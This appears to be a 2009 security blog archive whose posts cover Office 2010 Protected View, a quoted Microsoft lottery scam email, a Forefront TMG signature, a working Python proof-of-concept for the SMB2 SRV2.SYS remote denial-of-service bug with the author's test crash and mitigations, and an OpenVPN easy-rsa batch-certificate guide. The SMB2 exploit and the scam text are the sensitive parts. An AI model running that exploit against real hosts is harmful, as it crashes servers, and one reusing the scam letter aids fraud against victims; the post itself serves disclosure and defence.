Saturday, September 26, 2009

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open something through MSWord, Excel through direct download, all components within that document such as internet links, scripts or procedures may be enabled (depending on your security levels).

One feature i really like in Office 2010 is the fact that the software “knows” and treat whatever office documents downloaded via the internet and mark them as “public/unsafe”

Documents opened in Protected View (as its called) prevents malicious codes from being executed through sandboxing the application or isolating its process.

When launching a document in this mode, the task manager shows 2 processes of winword.exe (Microsoft word executable binary). Assuming that one of it is the original application running in normal mode but the one with the smaller memory footprint is probably the one being sandboxed (reduced functionality).

image

Once you’ve accepted to edit, see the ENABLE EDITING button on top right, it will execute the process in normal view and the so called sandboxed version is no longer in memory.

image

Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. Helps users be automatically protected, view the content first (incase curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys get smarter. To avoid being tagged spam, they send the main content body through word document. So it sailed pass the Hotmail antispam service and right into my inbox. Anyway, just share with you how ridiculously funny this is.

To top that, it comes from a yahoo address: evansokoli8@yahoo.com 

MICROSOFT INTERNET LOTTERY AWARD 2009

MORLEY HOUSE, 26-30 HOLBORN VIADUCTS,

LONDON EC1A 2BP.U.K.

Dear Email Owner,

We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009.

Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash.

FILE NUMBER: MIC/903/KPC/0108308/09.

1. Your Full Names:

2. Your Country:

3. Telephone Number:

4. Occupation:

5. Age:

To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund.

PAYMENT BANK CONTACT INFORMATION:

BANK NAME: ROYAL BANK OF SCOTLAND LONDON-UK

CONTACT PERSON: MR. STEPHEN HESTER

FOREIGN REMITTANCE DEPARTMENT

Tel: +44-703-174-7509

Fax: +44-870-471-8189

Tel/Fax: +44- 844-774-4940

Contact Email: stephenhester@mycin.net

WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements.

For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address: johnwilliams63@live.co.uk

Congratulations once again,

Mr. Evans Okoli.

Head Customer care Service

Microsoft Promotion Team

Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary.

© Copyright 2009 Microsoft Lottery promotion All Right Reserve"

Sunday, September 13, 2009

Forefront TMG NIS protects against SMB2.0 attacks


Microsoft has added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company informed that the protection against the Critical zero-day vulnerability in SMB 2.0 was the first 0-Day signature release ever introduced to Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.
“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for theVuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.
Want to try it out? Download here

Wednesday, September 9, 2009

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit code on SMB2 protocol (implemented in the newer OSes of Microsoft) that can easily remote BSDO a Windows server or client. SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client send to a SMB server, and it's used
to identify the SMB dialect that will be used for further communication.

POC

Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instance i pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang) just won’t boot! anymore…F@!@@!!!…   and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.

image

Also tried it on my x64 Windows 7 (also using SMB2.0) RTM Build 7600 but nothing happened. This means, Microsoft was informed of the bug and fixed it on the RTM build

All credits to Laurent GaffiƩ

Here’s the exploit code. You need to have file and print sharing enabled on Windows as well and of course, the firewall would allow file and print sharing from the network(s) that you are in.

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
# it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough …i know)
2) Enable host level IDS to detect this signature or custom make your own.
3) Enable firewalls to block SMB traffic from unknown sources (with the hope no one does this in the so called trusted network)

The following platforms are vulnerable ( i didn't test then personally though)

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test, Windows 2008 with SP2.

Microsoft posted this advisory but basically it doesn’t fix anything but just workaround to prevent SMB(2): http://www.microsoft.com/technet/security/advisory/975497.mspx

Friday, September 4, 2009

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia which deploy pfSense as a VPN gateway and firewall to a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID” which is then required to run OpenVPN daemon at the background and fires a connection whenever a layer 2 link is established.

To create under 300 certificates using OpenVPN’s (v2.x.x) easyrsa scripts on a CentOS clients isn’t funny. So being a lazy ass, i wrote a simple way to help to create these files fast!

Assuming you’ve got the whole works with OpenVPN and pfSense sorted. If not read this great document here. Once you’ve got the server side done on pfSense, you will need to generate more keys for (in this case, Pizza Hut’s) 300 branches peer certificates.

Snail factor

  • Build-key prompts amongst other things the commonName or server name each time a certificate is to be generated

What is needed?

  • To create store certificates that automatically creates the certificates without prompt and also using a $variable$ to “insert” the commonName value. This means, a certificate will be created with the storeID.key and storeID.crt and the storeID.csr

How - Conceptually?

  1. Automate the build-key file to disable prompts
  2. Fire a variable into the system to pickup the $variable$ which then will be the filename and the commonName

How – Technically

(Assumptions – easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In /easyrsa, you have all the scripts like build-ca, build-key)

Create a file called build_batch into /etc/openvpn/easyrsa with the following lines. Make the file executable chmod +x build_batch

#!/bin/sh

if test $# -ne 1; then
echo "usage: batch-build <name>";
exit 1
else
export KEY_CNAME=$1
./build-key $1
fi

Now, edit (nano/vi) the openssl.cnf file in the /etc/openvpn/easyrsa look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

# Add this line below
commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key in that same directory. At the end of the openssl –req and openssl ca statements, add the –batch argument.

This is how part of the original file look like

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -config $KEY_CONFIG && \

We modify to add –batch at some part of the line like below and save the file

openssl req -days 3650 -nodes -new -keyout $1.key -out $1.csr -batch -config $KEY_CONFIG && \
openssl ca -days 3650 -out $1.crt -in $1.csr -batch -config $KEY_CONFIG && \

Now you’re ready to run in batch. But before that, please feed the vars in the environment like below in /etc/openvpn/easyrsa

source vars

Run a sample like below

./build_batch test01

This will build the test01.crt, test01.csr and test01.key automatically in /etc/openvpn/easyrsa/keys with the commonName test01 also :)

Done.

Now, if you want to do lots of these, use this Excel below

Exceleasy-rsa-linemaker.xls

Use the Excel file (build-cert sheet) to generate script lines (see the excel sample) so you can copy and paste into a SSH remote session in the appropriate directory.

Copy in batch up to 50 lines (within buffer) from the copypaster column and paste via a SSH session into the /etc/openvpn/easyrsa and it will generate without prompting anything. Quick and easy.

image

To remove/revoke certs, do the same but use the Excel’s revoke-cert sheet.

image

<Ignore CRL/STR_COPY issues, i don’t have CRLs defined>

If things mess up a lot, just run. Warning, this will remove your CA, server and dh information which you then need to repopulate inside pfSense.

./clean-all

After clean-all you must recreate all below

./build-ca
./build-key-server
./build-dh

Then re run the above stuff.